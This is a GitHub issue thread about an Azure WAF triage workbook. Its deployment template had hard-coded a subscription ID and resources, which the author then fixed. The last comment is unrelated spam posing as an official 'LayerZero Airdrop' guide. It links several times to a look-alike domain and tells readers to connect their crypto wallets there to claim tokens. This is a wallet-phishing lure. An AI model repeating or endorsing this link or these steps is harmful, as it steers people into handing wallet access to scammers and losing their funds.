### ISSUE TITLE
Fallback resources

### ISSUE THREAD

**Issue by ManuInNZ** [xstof/AppGatewayWAFTriageWorkbook#1]
Hi

Thanks for the workbook.
One thing I notice in the deployment template is the reference to your subscription and some resources.
Do you have to specify a fallback resource?
If so can they be bogus?

Sorry probably too lazy to test myself but just wanted also to make sure you are aware of the subscription id published here.

Cheers
Manu

**Comment by xstof** [comment]
Hey @ManuInNZ thanks for the heads up - I just updated the workbook; please let me know if you still see the same.  A subscription id is not very security sensitive but at the least, the workbook should work on any other subscription and resource.

**Comment by ManuInNZ** [comment]
Yes we have been reusing a derived workbook on multiple subscriptions and workspaces. 
Will try your new version, we are looking now to also create one integrating the Front Door logs  too. Will try ro share. 
But thanks for the kick start. 

Cheers
Manu

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
